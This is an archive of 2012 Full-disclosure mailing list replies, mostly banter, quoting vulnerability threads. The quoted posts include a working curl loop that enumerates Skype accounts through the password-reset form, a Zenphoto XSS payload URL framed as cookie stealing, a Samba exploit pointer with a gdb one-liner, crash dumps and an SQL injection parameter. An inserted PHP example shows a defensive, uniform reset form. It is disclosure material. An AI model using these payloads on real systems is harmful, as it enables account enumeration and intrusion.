>> Sometimes when people argue over the definition of '0day', it is important 
>> to be clear.
> I never called my attack a 0-day, did I?
>> Although the bash script made it clear, I have never ever seen someone call 
>> 'user enumeration' an 'oracle attack'.
> Turns out I have never seen anybody call an 'oracle attack' 'user
> enumeration'.
>> Probably because this is 2012 and the Matrix hasn't just come out.
> Probably because the attack won't give you the whole list of usernames
> but instead tell you which e-mails (not necessarily being a username)
> on your list are on its list. Also turns out the concept of oracle has
> been in use on the computation world way before you think and before the
> OWASP guys arbitrarily decided such a name in, amongst others, the
> complexity theorems that keep the cryptography used nowadays secure, so,
> please, stop acting childishly over something as stupid as the name of
> the attack and concentrate instead on the exposed issue.
> 

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-15 Thread Benji
Furthermore, I didn't say you were talking about a '0day'. It was an example.

Re never seeing anyone call it user enumeration; do you live in a cave of some 
sort? This is what all a) major tools classify it as b) cve issuings classifies 
it as c) major infosec providers such as pentest companies.



Sent from my iPhone

On 15 Nov 2012, at 18:59, klondike  wrote:

> On 15/11/12 09:47, Benji wrote:
>> Sometimes when people argue over the definition of '0day', it is important 
>> to be clear.
> I never called my attack a 0-day, did I?
>> Although the bash script made it clear, I have never ever seen someone call 
>> 'user enumeration' an 'oracle attack'.
> Turns out I have never seen anybody call an 'oracle attack' 'user
> enumeration'.
>> Probably because this is 2012 and the Matrix hasn't just come out.
> Probably because the attack won't give you the whole list of usernames
> but instead tell you which e-mails (not necessarily being a username)
> on your list are on its list. Also turns out the concept of oracle has
> been in use on the computation world way before you think and before the
> OWASP guys arbitrarily decided such a name in, amongst others, the
> complexity theorems that keep the cryptography used nowadays secure, so,
> please, stop acting childishly over something as stupid as the name of
> the attack and concentrate instead on the exposed issue.
> 

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-15 Thread Benji
Also thank you for posting a link to a well known reference, that was super 
appreciated.

Next time link something like OWASP, at least most whitehats don't laugh at 
them so you gain more credibility.

Sent from my iPhone

On 15 Nov 2012, at 03:45, "Nick FitzGerald"  wrote:

> Benji wrote:
> 
>> Oracle attacks?
>> 
>> See into the future?
>> Padding oracle attacks?
>> Oracle SQL injections?
> 
> You noobs...
> 
>   http://www.drdobbs.com/understanding-oracle-attacks-on-informat/184405917
> 
> (Don't get too tied up in the crypto stuff in that article.)
> 
> klondike's point is that simply monitoring the response of the "user X 
> wants to change their password" web-form tells you whether there is, in 
> fact, a user named "X" on the system.  That's kinda obvious from the 
> bash script klondike provided, and I don't do bash...
> 
> 
> 
> Regards,
> 
> Nick FitzGerald
> 
> 


Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-15 Thread Benji
Hi genius of the year

Sometimes when people argue over the definition of '0day', it is important to 
be clear. Although the bash script made it clear, I have never ever seen 
someone call 'user enumeration' an 'oracle attack'. Probably because this is 
2012 and the Matrix hasn't just come out.

Sorry for not knowing non-industry terms used by 1% of the populace you hipster.

Sent from my iPhone

On 15 Nov 2012, at 03:45, "Nick FitzGerald"  wrote:

> Benji wrote:
> 
>> Oracle attacks?
>> 
>> See into the future?
>> Padding oracle attacks?
>> Oracle SQL injections?
> 
> You noobs...
> 
>   http://www.drdobbs.com/understanding-oracle-attacks-on-informat/184405917
> 
> (Don't get too tied up in the crypto stuff in that article.)
> 
> klondike's point is that simply monitoring the response of the "user X 
> wants to change their password" web-form tells you whether there is, in 
> fact, a user named "X" on the system.  That's kinda obvious from the 
> bash script klondike provided, and I don't do bash...
> 
> 
> 
> Regards,
> 
> Nick FitzGerald
> 
> 


Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-14 Thread Benji
Oracle attacks?

See into the future?
Padding oracle attacks?
Oracle SQL injections?


On Wed, Nov 14, 2012 at 3:44 PM, klondike  wrote:

> On 14/11/12 11:20, Kirils Solovjovs wrote:
> > The team has worked around this and are now trying to fix the
> > bug/feature. :)
> >
> >
> http://www.reddit.com/r/netsec/comments/13664q/skype_vulnerability_allowing_hijacking_of_any/
> Well, they also seem to be vulnerable to oracle attacks against the
> e-mail database through the same forgotten password form so I wouldn't
> be surprised if a spammer has already been exploiting this.
>
> Below is the classical bash script to exploit it, just input a newline
> separated list of e-mails and it will send the request and filter those
> which are clearly not in the database:
> $ while read mail trash; do curl
> 'https://login.skype.com/account/password-reset-request' -s -o- -b
> "skype-session-token=336ff76c68bf17b54eb0d2dc81f8bd6f1500a7fd" -d
> "email=$mail&session_token=336ff76c68bf17b54eb0d2dc81f8bd6f1500a7fd" |
> fgrep "The email address you entered is invalid." > /dev/null || echo
> $mail; done
>
> klondike
>
>
>
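Added example (not from the thread, and not Skype's code): the response difference that the quoted script greps for, modelled as a hypothetical PHP reset handler, next to a form that answers identically for known and unknown addresses, plus a check a test suite can run against either. Handler names, the account list and every message except the quoted "invalid" string are assumptions.

```php
<?php
// Added example; the handlers, account list and success wording are
// hypothetical. Only the "invalid" message text is taken from the thread.

const GENERIC_BODY = 'If that address belongs to an account, a reset link has been sent.';

/** Leaky form: the body differs depending on whether the address is known. */
function reset_request_leaky(string $email, array $accounts): array
{
    $key = strtolower(trim($email));
    if (!array_key_exists($key, $accounts)) {
        return ['status' => 200, 'body' => 'The email address you entered is invalid.'];
    }
    return ['status' => 200, 'body' => 'A reset link has been sent.'];
}

/** Uniform form: same status and body for known and unknown addresses. */
function reset_request_uniform(string $email, array &$queue): array
{
    $key = strtolower(trim($email));
    // A syntax check does not depend on the account database, so reporting
    // its result discloses nothing about who has an account.
    if (filter_var($key, FILTER_VALIDATE_EMAIL) === false) {
        return ['status' => 400, 'body' => 'Please enter a valid email address.'];
    }
    // The lookup and the mail are left to a background worker, so the
    // request path does the same work whether or not the account exists.
    $queue[] = $key;
    return ['status' => 200, 'body' => GENERIC_BODY];
}

/** Worker side: only addresses that match an account get a mail. */
function drain_queue(array &$queue, array $accounts): array
{
    $mailed = [];
    foreach ($queue as $key) {
        if (array_key_exists($key, $accounts)) {
            $mailed[] = $key;
        }
    }
    $queue = [];
    return $mailed;
}

/** Regression check: true when the responses let a client tell the cases apart. */
function leaks_existence(callable $handler, string $known, string $unknown): bool
{
    return $handler($known) !== $handler($unknown);
}

// Constructed data.
$accounts = ['alice@example.org' => true];
$queue    = [];

$leaky = function (string $e) use ($accounts): array {
    return reset_request_leaky($e, $accounts);
};
$uniform = function (string $e) use (&$queue): array {
    return reset_request_uniform($e, $queue);
};

var_dump(leaks_existence($leaky, 'alice@example.org', 'nobody@example.org'));
var_dump(leaks_existence($uniform, 'alice@example.org', 'nobody@example.org'));
var_dump(drain_queue($queue, $accounts));
```

Per-client rate limiting on the form is a separate control that this example does not cover.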

Re: [Full-disclosure] 0-day vulnerabilities in Call of Duty MW3 and CryEngine 3

2012-11-14 Thread Benji
>> 0-day means it is being actively used in the wild.

No it does not.


On Wed, Nov 14, 2012 at 2:52 PM, Christian Sciberras wrote:

> 0-day means it is being actively used in the wild.
> Is this the case?
>
>
> Chris.
>
>
> On Wed, Nov 14, 2012 at 10:52 AM, ReVuln  wrote:
>
>>
>> Following our presentation at POC2012 [1] conference, we have released:
>> a paper [2] regarding a NULL pointer dereference vulnerability affecting
>> Call of Duty: Modern Warfare 3 [3], and a video [4] demonstrating a remote
>> code execution vulnerability affecting CryEngine 3 [5].
>>
>> [1] http://powerofcommunity.net
>> [2] http://revuln.com/files/ReVuln_CoDMW3_null_pointer_dereference.pdf
>> [3] http://www.callofduty.com/mw3
>> [4] http://vimeo.com/53425372
>> [5] http://www.crytek.com/cryengine/cryengine3
>>
>>
>> ---
>> ReVuln
>> http://revuln.com
>> http://twitter.com/revuln
>>
>>
>>
>>
>

Re: [Full-disclosure] Skype account + IM history hijack vulnerability

2012-11-14 Thread Benji
This has nothing to do with the client. The service is at fault.

Also for the record, r/netsec is a huge circlejerk.


On Wed, Nov 14, 2012 at 10:20 AM, Kirils Solovjovs <
kirils.solovj...@kirils.com> wrote:

>
> The team has worked around this and are now trying to fix the
> bug/feature. :)
>
>
> http://www.reddit.com/r/netsec/comments/13664q/skype_vulnerability_allowing_hijacking_of_any/
>
>
> P.S. Not to say that there aren't any other security bugs to come. Use a
> secure  client!
>
> --
> Kirils Solovjovs
>

Re: [Full-disclosure] TTY handling when executing code in lower-privileged context (su, virt containers)

2012-11-10 Thread Benji
Furthermore, the handling of user privileges to disallow root logins is to
stop (stupid) users doing stupid things, security wise. If a lot of users
weren't forced to use unprivileged accounts, all the processes you're
talking about running would be run as root. AFAIK security is used to
protect from the lowest denominator up, not top down.


On Sat, Nov 10, 2012 at 6:49 PM, Benji  wrote:

> The advice weakens your system from a local perspective granted, but if an
> attacker has a local user on your box already, it's already game over.
>
> Yes, if you were a user with intelligence. I must've forgot that everyone
> that uses a computer does so with sense.
>
>
> On Sat, Nov 10, 2012 at 6:30 PM, Michal Zalewski wrote:
>
>> > I think you've taken that far too literally. My understanding of it is to
>> > protect against a) brute force retardation b) dumb attackers.
>>
>> The advice weakens the security of your system, because it means I
>> just need to compromise your unprivileged account (in which you run
>> your browser, mail client, and so on) to own the entire box.
>>
>> As for the benefits, care to elaborate? I'm not sure what a) and b)
>> really mean. If you're worried about brute-force, don't use trivial
>> passwords. If you worry about opportunistic attacks, do that and then
>> patch your stuff every now and then.
>>
>> /mz
>>
>
>

Re: [Full-disclosure] TTY handling when executing code in lower-privileged context (su, virt containers)

2012-11-10 Thread Benji
The advice weakens your system from a local perspective granted, but if an
attacker has a local user on your box already, it's already game over.

Yes, if you were a user with intelligence. I must've forgot that everyone
that uses a computer does so with sense.


On Sat, Nov 10, 2012 at 6:30 PM, Michal Zalewski wrote:

> > I think you've taken that far too literally. My understanding of it is to
> > protect against a) brute force retardation b) dumb attackers.
>
> The advice weakens the security of your system, because it means I
> just need to compromise your unprivileged account (in which you run
> your browser, mail client, and so on) to own the entire box.
>
> As for the benefits, care to elaborate? I'm not sure what a) and b)
> really mean. If you're worried about brute-force, don't use trivial
> passwords. If you worry about opportunistic attacks, do that and then
> patch your stuff every now and then.
>
> /mz
>

Re: [Full-disclosure] TTY handling when executing code in lower-privileged context (su, virt containers)

2012-11-10 Thread Benji
"This is why I find the standard security mantra of "disable root
logins and use su / sudo" to be extremely silly."

I think you've taken that far too literally. My understanding of it is to
protect against a) brute force retardation b) dumb attackers. No one said
it's supposed to completely protect uid=0. If you're seeing that as
"extremely silly" then you're interpreting the recommendation in the wrong
way.


On Sat, Nov 10, 2012 at 5:06 PM, Michal Zalewski wrote:

> > "Using su to execute commands as an untrusted user from an interactive
> > shell may allow the untrusted user to escalate privileges to the user
> > running the shell."
>
> If you have the ability to execute code on that terminal before the
> user executes su, it is also possible to simply never allow the real
> su application to run until you've already captured the credentials and
> escalated to root. For example, you could define an alias or
> change PATH in the shell; ptrace the shell or use LD_PRELOAD to change
> its semantics; or simply never return to the shell at all, and simply
> fake all the subsequent interactions with it (not particularly hard to
> do this in a convincing way).
>
> This is why I find the standard security mantra of "disable root
> logins and use su / sudo" to be extremely silly.
>
> In general, very few OSes are designed to handle such scenarios gracefully.
>
> /mz
>

Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption

2012-10-29 Thread Benji
"if at first you don't succeed, next time might be a fluke"

On Mon, Oct 29, 2012 at 2:49 AM, kaveh ghaemmaghami
 wrote:
> It reminds me my question from VUPEN Security Team when i got seek
> from their exploitions
>
> How can i make sure a crash is not exploitable? (( The short answer is
> simple assume every crash is exploitable and just fix it.))
>
> Best Regards
>
> On Mon, Oct 29, 2012 at 5:47 AM, kaveh ghaemmaghami
>  wrote:
>> Hello list
>>
>> Dear Peter and others please take a look @ it
>>
>> Best Regards
>> Kaveh Ghaemmaghami
>>
>> Title :  Microsoft Office Excel 2010 memory corruption
>> Version   :  Microsoft Office professional Plus 2010
>> Date  :  2012-10-27
>> Vendor:  http://office.microsoft.com
>> Impact:  Med/High
>> Contact   :  coolkaveh [at] rocketmail.com
>> Twitter   :  @coolkaveh
>> tested:  XP SP3 ENG
>> ###
>> Bug :
>> 
>> memory corruption during the handling of the xls files a
>> context-dependent attacker
>> can execute arbitrary code  (need investigate )
>> 
>> 
>> (b4c.1350): Access violation - code c005 (first chance)
>> First chance exceptions are reported before any exception handling.
>> This exception may be expected and handled.
>> eax=0584
>> ebx=00135070
>> ecx=1000
>> edx=105f
>> esi=06a80800
>> edi=0040
>> eip=301ce0d0
>> esp=001302f0
>> ebp=00131d6c iopl=0 nv up ei pl zr na pe nc
>> cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010246
>> *** ERROR: Symbol file could not be found.  Defaulted to export
>> symbols for Excel.exe -
>> Excel!Ordinal40+0x1ce0d0:
>> 301ce0d0 668b5008mov dx,word ptr [eax+8]  
>> ds:0023:058c=
>> 
>> Proof of concept included.
>> http://www36.zippyshare.com/v/48422905/file.html
>


Re: [Full-disclosure] Microsoft Windows Help program (WinHlp32.exe) memory corruption

2012-10-27 Thread Benji
Hi dear sir madam friend

Responsibly taking on authority, go play with fireworks in traffic

On 27 Oct 2012, at 17:58, adam  wrote:

> Hi
> Dear Sir,
> I have drank 5 cans of Pepsi today.
> I can discuss with authority responsible.
> Best Regards
> 
> On Sat, Oct 27, 2012 at 11:55 AM, kaveh ghaemmaghami 
>  wrote:
>> Hi
>> Dear Sir,
>> I have reached 12 crashes during Microsoft Windows Help program test.
>> I can discuss with authority responsible
>> Best Regards
>> 
>> On Sat, Oct 27, 2012 at 2:45 PM, kaveh ghaemmaghami
>>  wrote:
>> > Hello list!
>> >
>> > I want to warn you about Microsoft Windows Help program (WinHlp32.exe)
>> > memory corruption
>> >
>> > Best Regards
>> >
>> > Kaveh Ghaemmaghami aka (coolkaveh)
>> >
>> > -
>> > #!/usr/bin/perl
>> > #Title:  Microsoft Windows Help program(WinHlp32.exe)memory corruption
>> > #Version  :  5.1.2600
>> > #Date :  2012-10-21
>> > #Vendor   :  http://www.microsoft.com
>> > #Crash:  http://img69.imageshack.us/img69/7652/helpview.jpg
>> > #Impact   :  Med/High
>> > #Contact  :  coolkaveh [at] rocketmail.com
>> > #Twitter  :  @coolkaveh
>> > #tested   :  XP SP3 ENG
>> > #Author   :  coolkaveh
>> > ###
>> > #Info :
>> > #
>> > #The HLP file is Microsoft Help file documentation for the Windows
>> > operating system or Windows programs.
>> > #The file contains documentation for the Windows operating system or
>> > Windows programs.
>> > #
>> > #Bug :
>> > #
>> > #Memory corruption during the handling of the hlp files by Microsoft
>> > Windows default
>> > #help viewer (WinHlp32.exe)
>> > #Successful exploits can allow attackers to execute arbitrary code
>> > ###
>> > #(f3c.e64): Access violation - code c005 (first chance)
>> > #First chance exceptions are reported before any exception handling.
>> > #This exception may be expected and handled.
>> > #eax=
>> > #ebx=000a3d08
>> > #ecx=3fffeb6b
>> > #edx=0003
>> > #esi=000a8fa8
>> > #edi=000a9000
>> > #eip=77c47380
>> > #esp=0007f528
>> > #ebp=0007f530 iopl=0 nv up ei pl nz ac po nc
>> > #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= 
>> > efl=00010212
>> > #*** ERROR: Symbol file could not be found.  Defaulted to export
>> > symbols for C:\WINDOWS\system32\msvcrt.dll -
>> > #msvcrt!memmove+0xd0:
>> > #77c47380 f3a5rep movs dword ptr es:[edi],dword ptr [esi]
>> > #1:001>!exploitable -v
>> > #First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC005)
>> > #Exception Sub-Type: Write Access Violation
>> > #Description: User Mode Write AV
>> > #Short Description: WriteAV
>> > #Exploitability Classification: EXPLOITABLE
>> > #Recommended Bug Title: Exploitable - User Mode Write AV starting at
>> > msvcrt!memmove+0x00d0 (Hash=0x613a0f0c.0x41551815)
>> > #User mode write access violations that are not near NULL are exploitable.
>> > ###

Re: [Full-disclosure] vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities

2012-10-21 Thread Benji
also while we're at it can you please remove all references to common
sense and logic in any emails that are in the full disclosure archive.
wait...

On Sun, Oct 21, 2012 at 2:09 PM, ZeroDay.JP  wrote:
> Full Disclosure Maillist Admin, please kindly delete the posted email of
> "vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities" posted in Full
> Disclosure, for the security purpose.
>
> Understanding the positive purpose of the researchers who expose it ; Still,
> this vulns concept cannot be exposed in public, where the merit of its
> exposure is not equal to the DAMAGE caused by exposing such information. The
> disclosure damage itself is affecting other botnets takedown process which
> adding the challenge & effort taken, so takedowns will be harder than
> before.
>
> VOlk-Botnet 4.0. is a malicious application whose origins have been traced
> back to Mexico. The system was designed w/common concept of a malicious
> botnets infrastructure.
>
> ---
> Hendrik ADRIAN - http://0day.jp
> OP #MalwareMustDie http://malwaremustdie.blogspot.com/
>
>
>
>
> Sent to you by ZeroDay.JP via Google Reader:
>
>
>
>
> vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
>
> via Full Disclosure on 10/11/12
>
> Posted by Vulnerability Lab on Oct 11
>
> Title:
> ==
> vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
>
> Date:
> =
> 2012-10-09
>
> References:
> ===
> http://www.vulnerability-lab.com/get_content.php?id=721
>
> VL-ID:
> =
> 721
>
> Common Vulnerability Scoring System:
> 
> 8.3
>
> Introduction:
> =
> vOlk-Botnet v4.0 is a remote administration tool, its main function is to
> manage the HOSTS file of the windows
> operating systems The code created...
>
>
>
>


Re: [Full-disclosure] Cookie stealing and XSS vulnerable in Zenphoto version 1.4.3.2

2012-10-02 Thread Benji
Why did you report this to UKCERT?

On Tue, Oct 2, 2012 at 7:16 AM, Scott Herbert
 wrote:
>
> -
> Affected products:
> -
>
> Product :   Zenphoto 1.4.3.2 (and maybe older) fixed in 1.4.3.3
> Affected function:  printPublishIconLink
>
> --
> Details:
> --
>
> The file admin-news-articles.php calls the function printPublishIconLink,
> which generates HTML from data stored in the $_GET superglobal. This can be
> used to generate an XSS attack or, more seriously, as an admin user needs to be
> logged in to access the page admin-news-articles.php, a cookie-stealing
> script.
>
> Example code:
> http://127.0.0.1/zenphoto/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>
>
> 
> Suggested fix:
> 
>
> Sanitize the $_GET super global on lines 1637 through 1641 in
> zenpage-admin-functions.php file
>
> 
> Timeline:
> 
>
> 12-Sept-2012  Zenphoto and UK-CERT informed
> 18-Sept-2012 Zenphoto confirmed and fixed (see
> http://www.zenphoto.org/trac/changeset/10836).
> 1-Oct-2012 Zenphoto 1.4.3.3 released fixing hole.
>
> --
> Scott Herbert Cert Web Apps (Open)
> http://blog.scott-herbert.com/
> Twitter @Scott_Herbert
>
>


Re: [Full-disclosure] Paypal BugBounty #9 - Persistent Web Vulnerabilities

2012-10-02 Thread Benji
..

On Tue, Oct 2, 2012 at 6:40 AM, Vulnerability Lab
 wrote:
> Title:
> ==
> Paypal BugBounty #9 - Persistent Web Vulnerabilities
>
>
> Date:
> =
> 2012-10-02
>
>
> References:
> ===
> http://www.vulnerability-lab.com/get_content.php?id=646
>
>
> VL-ID:
> =
> 646
>
>
> Status:
> 
> Published
>
>
>
>
> --
> VULNERABILITY RESEARCH LABORATORY
> LABORATORY RESEARCH TEAM
> CONTACT: resea...@vulnerability-lab.com
>
>


Re: [Full-disclosure] samba exploit - remote root colonel 0day

2012-09-25 Thread Benji
Dear genius

I believe the point was to not give credit

lot of love,
captain obvious

On Mon, Sep 24, 2012 at 4:04 PM, Julius Kivimäki
 wrote:
> {*} samba 3.x remote root by  {*}
> Give some credit to the guy who actually made this.
> 2012/9/24 
>>
>>
>> Massive 0day hide all your printers.
>>
>> http://pastebin.com/AwpsBWVQ
>>
>> # finding targets 4 31337z:
>> # gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk
>> '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
>> #-> to get system_libc_addr, enter this value in the
>> 'system_libc_offset' value of the target_finder, run, sit back, wait for
>> shell
>>
>> by kd aka r4c1st of eax
>>
>>
>> Sent using Hushmail
>>


Re: [Full-disclosure] [HTTPCS] FreeWebshop 'Text' Remote SQL Injection Vulnerability

2012-09-17 Thread Benji
you seem surprised by the level of idiocy, are you new to this list?

On Mon, Sep 17, 2012 at 2:42 PM, Julius Kivimäki
 wrote:
> Did you guys seriously just send five different advisories on five different
> vulnerable parameters on one vulnerable script?
>
> 2012/9/17 HTTPCS 
>>
>> HTTPCS Advisory : HTTPCS100
>> Product : FreeWebshop
>> Version : 2.2.9
>> Date : 2012-09-17
>> Criticality level : Highly Critical
>> Description : A vulnerability has been discovered in FreeWebshop, which
>> can be exploited by malicious people to conduct SQL injection attacks. Input
>> passed via the 'Text' parameter to '/index.php?page=cart&action=add' is not
>> properly sanitised before being used in a SQL query. This can be exploited
>> to manipulate SQL queries by injecting arbitrary SQL code.
>> Page : /index.php?page=cart&action=add
>> Variables :
>> sub=Bestellen&prodprice=1234.56&numprod=1&prodid=1&Text=[VulnHTTPCS]
>> Type : SQLI
>> Method : POST
>> Solution :
>> References : https://www.httpcs.com/advisory/httpcs100
>> Credit : HTTPCS [Web Vulnerability Scanner]
>> ___
>>
>> Twitter : http://twitter.com/HTTPCS_
>> Free web vulnerability scanner HTTPCS : https://www.httpcs.com/
>>


Re: [Full-disclosure] Adobe Flash Update Installs Other Warez without Consent

2012-09-08 Thread Benji
You've been using gmail for 15 years? That's so impressive, it's almost 
unbelievable

Sent from my iPhone

On 8 Sep 2012, at 22:25, Jeffrey Walton  wrote:

> > is that why you use gmail?
> I know. I'm preparing for a migration now. It's hard to throw away 10 or
> 15 years of history.
> 
> On Sat, Sep 8, 2012 at 5:18 PM, Benji  wrote:
>>> Explorer and IE vulnerabilities. Plus, I'm not trying to feed Google
>>> any more data through their back channels by using their browser.
>> 
>> is that why you use gmail?
>> 
>> On Sat, Sep 8, 2012 at 10:14 PM, Jeffrey Walton  wrote:
>>> Hi Christian,
>>> 
>>> [Corrected Title]
>>> 
>>> I'll feed you one last time. Here are the results from a second machine.
>>> 
>>> flash-update-1 shows the web page Flash Update opened to download the 
>>> update.
>>> 
>>> flash-update-2 shows the only preferences or selections presented when
>>> running the EXE downloaded from the previous step.
>>> 
>>> flash-update-3 shows the flash update, and the additional Google crap.
>>> 
>>> WebKit is insecure junk
>>> (http://web.nvd.nist.gov/view/vuln/search-results?query=WebKit&search_type=all&cves=on),
>>> and I don't want it on my machines. It's bad enough I have to manage
>>> Explorer and IE vulnerabilities. Plus, I'm not trying to feed Google
>>> any more data through their back channels by using their browser.
>>> 
>>> Jeff
>>> 
>>> On Sat, Sep 8, 2012 at 7:02 AM, Christian Sciberras  
>>> wrote:
>>>> His initial email doesn't make him look like a newb? Really?
>>>> 
>>>> Quoting: "It appears Adobe has become a whore to Google like Mozilla."
>>>> 
>>>> Typical response from an attention-starved kid. Except he's no kid.
>>>> 
>>>> Hmmm.
>>>> 
>>>> Then there's the whole bullshit he's been talking about - which by the way,
>>>> several people categorically proved to be inaccurate, if not plain wrong.
>>>> 
>>>> On Sat, Sep 8, 2012 at 1:15 AM, Mark  wrote:
>>>>> 
>>>>> You're right. Jeffrey is no newb. Sorry if it came over the wrong way.
>>>>> 
>>>>> On 08/09/2012 0:31, Michael D. Wood wrote:
>>>>>> You guys are acting like Jeffrey is a newb to all this stuff.  I'm sure
>>>>>> he knows what mbam and spybot are, and is able to scan his machine. I'm
>>>>>> sure he knows to go straight to the source when downloading flash
>>>>>> player, albeit Adobe does include the annoying toolbar unless you choose
>>>>>> not to install.
>>>>>> 
>>>>>> --
>>>>>> Michael D. Wood
>>>>>> ITSecurityPros.org
>>>>>> www.itsecuritypros.org
>>>>>> 
>>>>>> - Reply message -
>>>>>> From: "Mark" 
>>>>>> To: 
>>>>>> Cc: "Full Disclosure b" , "BugTraq"
>>>>>> 
>>>>>> Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez
>>>>>> without Consent
>>>>>> Date: Fri, Sep 7, 2012 5:32 pm
>>>>>> 
>>>>>> 
>>>>>> You didn't download it from download.cnet.com, by any chance?
>>>>>> Sounds more like an infection to me.
>>>>>> For windows, download and run the following programs.
>>>>>> http://www.filehippo.com/download_malwarebytes_anti_malware/
>>>>>> http://www.filehippo.com/download_spybot_search_destroy/5168/
>>>>>> http://www.filehippo.com/download_superantispyware/
>>>>>> 
>>>>>> 
>>>>>> On 06/09/2012 19:09, Jeffrey Walton wrote:
>>>>>>> The company that writes the worlds most insecure software [1,2,3] has
>>>>>>> figured out a way to further increase an attack surface.
>>>>>>> 
>>>>>>> Adobe now includes additional warez in their updates without consent.
>>>>>>> The warez includes a browser and tools bar. The attached image is what
>>>>>>> I got when I agreed to update Adobe Flash because of recent security
>>>>>>> vulnerability fixes.
>>>>>>> 
>>>>>>> It appears Adobe has become a whore to Google like Mozilla.
>>>>>>> 
>>>>>>> +1 Adobe.
>>>>>>> 
>>>>>>> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>>>>>>> [2]
>>>>>> 
>>>>>> http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>>>>>>> [3]
>>>>>> 
>>>>>> http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>>>>>>> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/



Re: [Full-disclosure] Adobe Flash Update Installs Other Warez without Consent

2012-09-08 Thread Benji
> Explorer and IE vulnerabilities. Plus, I'm not trying to feed Google
> any more data through their back channels by using their browser.

is that why you use gmail?

On Sat, Sep 8, 2012 at 10:14 PM, Jeffrey Walton  wrote:
> Hi Christian,
>
> [Corrected Title]
>
> I'll feed you one last time. Here are the results from a second machine.
>
> flash-update-1 shows the web page Flash Update opened to download the update.
>
> flash-update-2 shows the only preferences or selections presented when
> running the EXE downloaded from the previous step.
>
> flash-update-3 shows the flash update, and the additional Google crap.
>
> WebKit is insecure junk
> (http://web.nvd.nist.gov/view/vuln/search-results?query=WebKit&search_type=all&cves=on),
> and I don't want it on my machines. It's bad enough I have to manage
> Explorer and IE vulnerabilities. Plus, I'm not trying to feed Google
> any more data through their back channels by using their browser.
>
> Jeff
>
> On Sat, Sep 8, 2012 at 7:02 AM, Christian Sciberras  wrote:
>> His initial email doesn't make him look like a newb? Really?
>>
>> Quoting: "It appears Adobe has become a whore to Google like Mozilla."
>>
>> Typical response from an attention-starved kid. Except he's no kid.
>>
>> Hmmm.
>>
>> Then there's the whole bullshit he's been talking about - which by the way,
>> several people categorically proved to be inaccurate, if not plain wrong.
>>
>> On Sat, Sep 8, 2012 at 1:15 AM, Mark  wrote:
>>>
>>> You're right. Jeffrey is no newb. Sorry if it came over the wrong way.
>>>
>>> On 08/09/2012 0:31, Michael D. Wood wrote:
>>> > You guys are acting like Jeffrey is a newb to all this stuff.  I'm sure
>>> > he knows what mbam and spybot are, and is able to scan his machine. I'm
>>> > sure he knows to go straight to the source when downloading flash
>>> > player, albeit Adobe does include the annoying toolbar unless you choose
>>> > not to install.
>>> >
>>> > --
>>> > Michael D. Wood
>>> > ITSecurityPros.org
>>> > www.itsecuritypros.org
>>> >
>>> > - Reply message -
>>> > From: "Mark" 
>>> > To: 
>>> > Cc: "Full Disclosure b" , "BugTraq"
>>> > 
>>> > Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez
>>> > without Consent
>>> > Date: Fri, Sep 7, 2012 5:32 pm
>>> >
>>> >
>>> > You didn't download it from download.cnet.com, by any chance?
>>> > Sounds more like an infection to me.
>>> > For windows, download and run the following programs.
>>> > http://www.filehippo.com/download_malwarebytes_anti_malware/
>>> > http://www.filehippo.com/download_spybot_search_destroy/5168/
>>> > http://www.filehippo.com/download_superantispyware/
>>> >
>>> >
>>> > On 06/09/2012 19:09, Jeffrey Walton wrote:
>>> >> The company that writes the worlds most insecure software [1,2,3] has
>>> >> figured out a way to further increase an attack surface.
>>> >>
>>> >> Adobe now includes additional warez in their updates without consent.
>>> >> The warez includes a browser and tools bar. The attached image is what
>>> >> I got when I agreed to update Adobe Flash because of recent security
>>> >> vulnerability fixes.
>>> >>
>>> >> It appears Adobe has become a whore to Google like Mozilla.
>>> >>
>>> >> +1 Adobe.
>>> >>
>>> >> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>>> >> [2]
>>> >
>>> > http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>>> >> [3]
>>> >
>>> > http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>>> >> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
>


Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent

2012-09-08 Thread Benji
Christian, are you suggesting the people from "itsecuritypros.org" are
in fact, idiots?!

On Sat, Sep 8, 2012 at 12:02 PM, Christian Sciberras  wrote:
> His initial email doesn't make him look like a newb? Really?
>
> Quoting: "It appears Adobe has become a whore to Google like Mozilla."
>
> Typical response from an attention-starved kid. Except he's no kid.
>
> Hmmm.
>
>
> Then there's the whole bullshit he's been talking about - which by the way,
> several people categorically proved to be inaccurate, if not plain wrong.
>
>
>
>
>
> On Sat, Sep 8, 2012 at 1:15 AM, Mark  wrote:
>>
>> You're right. Jeffrey is no newb. Sorry if it came over the wrong way.
>>
>> On 08/09/2012 0:31, Michael D. Wood wrote:
>> > You guys are acting like Jeffrey is a newb to all this stuff.  I'm sure
>> > he knows what mbam and spybot are, and is able to scan his machine. I'm
>> > sure he knows to go straight to the source when downloading flash
>> > player, albeit Adobe does include the annoying toolbar unless you choose
>> > not to install.
>> >
>> > --
>> > Michael D. Wood
>> > ITSecurityPros.org
>> > www.itsecuritypros.org
>> >
>> > - Reply message -
>> > From: "Mark" 
>> > To: 
